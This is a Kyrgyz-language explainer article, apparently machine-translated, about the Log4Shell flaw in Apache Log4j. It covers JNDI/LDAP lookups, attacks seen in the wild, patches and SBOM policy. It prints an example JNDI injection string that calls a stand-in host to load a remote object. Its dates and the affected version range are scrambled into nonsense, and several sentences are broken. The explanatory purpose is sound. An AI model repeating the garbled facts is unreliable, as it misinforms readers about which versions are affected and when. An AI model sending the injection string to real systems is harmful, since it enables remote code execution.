Мазмуну[Жашыруу][Көрсөтүү]
2021-жылдын ноябрь айынын аягында биз киберкоопсуздукка негизги коркунучту ачтык. Бул эксплуатация дүйнө жүзү боюнча миллиондогон компьютер системаларына таасир этиши мүмкүн.
Бул Log4j алсыздыгы жана көз жаздымда калган дизайн кемчилиги дүйнөдөгү компьютердик кызматтардын 90% чабуулга кандайча ачык калганы боюнча колдонмо.
Apache Log4j – бул Apache Software Foundation тарабынан иштелип чыккан ачык булактуу Java негизиндеги журналдарды каттоо программасы. Башында 2001-жылы Ceki Gülcü тарабынан жазылган, ал азыр Apache Software Foundation долбоорунун Apache Logging Services программасынын бир бөлүгү болуп саналат.
Дүйнө жүзүндөгү компаниялар Log4j китепканасын өздөрүнүн тиркемелерине кирүүнү иштетүү үчүн колдонушат. Чынында, Java китепканасы бардык жерде бар, аны Amazon, Microsoft, Google жана башка колдонмолордон таба аласыз.
Китепкананын атактуулугу коддогу кандайдыр бир мүчүлүштүк миллиондогон компьютерлерди хакерликке ачык калтырышы мүмкүн экенин билдирет. 24-жылдын 2021-ноябрында А булут коопсуздугу Alibaba үчүн иштеген изилдөөчү коркунучтуу кемчиликти тапты.
Log4j аялуулугу, ошондой эле Log4Shell деп да белгилүү, 2013-жылдан бери байкалбай келген. Бул аялуу зыяндуу актерлорго Log4j иштеткен жабыркаган системаларда кодду иштетүүгө мүмкүндүк берди. Бул коомчулукка 9-жылдын 2021-декабрында жарыяланган
Өнөр жай эксперттери Log4Shell кемчилигин деп аташат акыркы эс тутумдагы эң чоң аялуу.
Алсыздык жарыялангандан кийинки жумада киберкоопсуздук топтору миллиондогон чабуулдарды аныкташкан. Кээ бир изилдөөчүлөр, атүгүл мүнөтүнө жүздөн ашуун чабуулдарды байкашкан.
Бул кантип иштейт?
Log4Shell эмне үчүн мынчалык коркунучтуу экенин түшүнүү үчүн, анын эмнеге жөндөмдүү экенин түшүнүшүбүз керек.
Log4Shell алсыздыгы кодду ээн-эркин аткарууга мүмкүндүк берет, бул негизинен чабуулчу максаттуу машинада каалаган буйрукту же кодду иштете алат дегенди билдирет.
Муну кантип ишке ашырат?
Биринчиден, биз JNDI деген эмне экенин түшүнүшүбүз керек.
Java аталышы жана каталог интерфейси (JNDI) Java программаларына ат аркылуу маалыматтарды жана ресурстарды табууга жана издөөгө мүмкүндүк берген Java кызматы. Бул каталог кызматтары маанилүү, анткени алар тиркемелерди түзүүдө иштеп чыгуучуларга оңой шилтеме кылуу үчүн уюшулган жазуулар топтомун камсыз кылат.
JNDI белгилүү бир каталогго кирүү үчүн ар кандай протоколдорду колдоно алат. Бул протоколдордун бири Lightweight Directory Access Protocol же LDAP болуп саналат.
Сапты жазып жатканда, log4j форманын туюнтмаларына туш болгондо сапты алмаштырууну ишке ашырат ${prefix:name}
.
Мисалы, Text: ${java:version}
Текст катары катталышы мүмкүн: Java версиясы 1.8.0_65. Мындай алмаштыруулар кадимки көрүнүш.
сыяктуу туюнтмаларга да ээ боло алабыз Text: ${jndi:ldap://example.com/file}
LDAP протоколу аркылуу URL'ден Java объектисин жүктөө үчүн JNDI тутумун колдонот.
Бул ошол URL'ден келген маалыматтарды машинага эффективдүү жүктөйт. Ар бир потенциалдуу хакер зыяндуу кодду жалпыга ачык URL дарегине жайгаштырып, Log4j колдонгон машиналар аны журналга киргизүүнү күтө алат.
Журнал билдирүүлөрүнүн мазмуну колдонуучу тарабынан башкарылуучу маалыматтарды камтыгандыктан, хакерлер өздөрү көзөмөлдөгөн LDAP серверлерин көрсөткөн өздөрүнүн JNDI шилтемелерин киргизе алышат. Бул LDAP серверлери JNDI аялуу аркылуу ишке ашыра турган зыяндуу Java объекттерине толушу мүмкүн.
Муну ого бетер начарлаткан нерсе, бул тиркеме сервер тараптабы же кардар тараптабы, айырмасы жок.
Логер үчүн чабуулчунун зыяндуу кодун окууга мүмкүнчүлүк бар болсо, колдонмо дагы эле эксплуатацияларга ачык.
Кимге таасир этет?
Алсыздык 4 версиясынан 2.0 чейин жана анын ичинде APache Log2.14.1j колдонгон бардык системаларга жана кызматтарга таасирин тийгизет.
Бир нече коопсуздук эксперттери алсыздык Java колдонгон бир катар колдонмолорго таасир этиши мүмкүн деп кеңеш беришет.
Кемчилик биринчи жолу Microsoft компаниясына таандык Minecraft видео оюнунда табылган. Microsoft өз колдонуучуларын кандайдыр бир коркунучтун алдын алуу үчүн Java чыгарылышындагы Minecraft программасын жаңыртууга үндөдү.
Жен Истерли, Киберкоопсуздук жана инфраструктуралык коопсуздук агенттигинин (CISA) директору, сатуучулар негизги жоопкерчилик акыркы колдонуучулардын бул алсыздыкты пайдаланган зыяндуу катышуучуларынын алдын алуу үчүн.
"Сатуучулар ошондой эле кардарлары менен байланышып, акыркы колдонуучулар алардын өнүмүндө бул алсыздык бар экенин билиши керек жана программалык камсыздоо жаңыртууларына артыкчылык бериши керек."
Кол салуулар эбак эле башталганы кабарланууда. Киберкоопсуздук боюнча программалык камсыздоону камсыз кылган Symantec компаниясы кол салуу боюнча ар кандай суроо-талаптарды байкады.
Бул жерде изилдөөчүлөр аныктаган чабуул түрлөрүнүн кээ бир мисалдары келтирилген:
- botnets
Ботнеттер – бул бир чабуулчу тараптын көзөмөлүндө турган компьютерлердин тармагы. Алар DDoS чабуулдарын жасоого, маалыматтарды уурдоого жана башка алдамчылыктарга жардам берет. Окумуштуулар Muhstik ботнеттерин Log4j эксплойтинен жүктөлүп алынган кабык скрипттеринен байкашкан.
- XMRig Miner троян
XMRig - бул Monero токенин казуу үчүн CPU колдоно турган ачык булактуу криптовалюталык шахтер. Киберкылмышкерлер XMRig'ди адамдардын түзмөктөрүнө орното алышат, ошондуктан алар өздөрүнүн иштетүү күчүн билбестен колдоно алышат.
- Khonsari Ransomware
Ransomware үчүн иштелип чыккан кесепеттүү программанын бир түрүн билдирет файлдарды шифрлөө компьютерде. Андан кийин чабуулчулар шифрленген файлдарга кирүү мүмкүнчүлүгүн берүү үчүн төлөм талап кыла алышат. Окумуштуулар Log4Shell чабуулдарынан Khonsari ransomware табышты. Алар Windows серверлерин бутага алышат жана .NET алкагын колдонушат.
Эми эмне болот?
Эксперттер Log4J алсыздыгынан келип чыккан башаламандыкты толугу менен оңдоо үчүн айлар, атүгүл жылдар талап кылынышы мүмкүн деп болжолдошууда.
Бул процесс ар бир жабыр тарткан системаны жамаачыланган версиясы менен жаңыртууну камтыйт. Бул системалардын бардыгы жаңыланган болсо дагы, серверлер чабуул үчүн ачык терезеге хакерлер буга чейин кошуп коюшкан мүмкүн болгон бэкдорлордун коркунучу бар.
көп чечимдер жана жумшартуулар колдонмолордун бул мүчүлүштүктөн пайдаланылышын алдын алуу үчүн бар. Жаңы Log4j версиясы 2.15.0-rc1 бул алсыздыкты азайтуу үчүн ар кандай орнотууларды өзгөрттү.
JNDI колдонгон бардык функциялар демейки боюнча өчүрүлөт жана алыстан издөө да чектелген. Log4j орнотууңуздагы издөө функциясын өчүрүү мүмкүн болгон эксплуатациялардын коркунучун азайтууга жардам берет.
Log4jден тышкары, ачык булактагы эксплуатациялардын алдын алуу үчүн дагы эле кеңири планга муктаждык бар.
Май айынын башында Ак үй жарыялаган аткаруу тартиби улуттук киберкоопсуздукту жакшыртууга багытталган. Ал негизинен тиркемени куруу үчүн зарыл болгон ар бир пункттун тизмесин камтыган расмий документ болгон программалык камсыздоонун материалдарынын (SBOM) жобосун камтыган.
Бул сыяктуу бөлүктөрдү камтыйт ачык булак иштеп чыгуу үчүн колдонулган пакеттер, көз карандылыктар жана API'лер. SBOM идеясы ачык-айкындуулук үчүн пайдалуу болсо да, ал чындап керектөөчүгө жардам береби?
Көз карандылыкты жогорулатуу өтө көп түйшүк болушу мүмкүн. Компаниялар альтернативалуу пакеттерди табуу үчүн кошумча убакытты текке кетирүүнүн ордуна ар кандай айыптарды төлөөнү тандай алышат. Балким, бул SBOMs алар болсо гана пайдалуу болот масштабы андан ары чектелет.
жыйынтыктоо
Log4j маселеси уюмдар үчүн жөн гана техникалык көйгөй эмес.
Бизнес лидерлери алардын серверлери, өнүмдөрү же кызматтары өздөрү колдобогон кодго таянганда келип чыгышы мүмкүн болгон тобокелдиктерди билиши керек.
Ачык булактуу жана үчүнчү тараптын тиркемелерине таянуу ар дайым кандайдыр бир тобокелчилик менен коштолот. Компаниялар жаңы коркунучтар ачыкка чыкканга чейин тобокелдиктерди азайтуу стратегияларын иштеп чыгууну ойлонушу керек.
Интернеттин көбү дүйнө жүзү боюнча миңдеген волонтерлор тарабынан колдоого алынган ачык булактуу программалык камсыздоого таянат.
Эгерде биз интернетти коопсуз жерде сактагыбыз келсе, өкмөттөр жана корпорациялар ачык булактагы аракеттерди жана киберкоопсуздук агенттиктерин каржылоого инвестиция кылышы керек, мисалы CISA.
Таштап Жооп